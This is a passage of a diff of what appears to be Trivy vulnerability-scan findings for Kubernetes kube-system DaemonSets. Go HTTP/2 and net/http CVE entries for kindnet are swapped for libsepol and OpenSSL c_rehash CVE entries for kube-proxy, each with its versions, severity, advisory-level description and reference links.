"https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20201112073958-5cba982894dd", - "packageName": "golang.org/x/sys", + "fixedVersion": "1.1.1n-0+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + }, + { + "type": "URL", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": 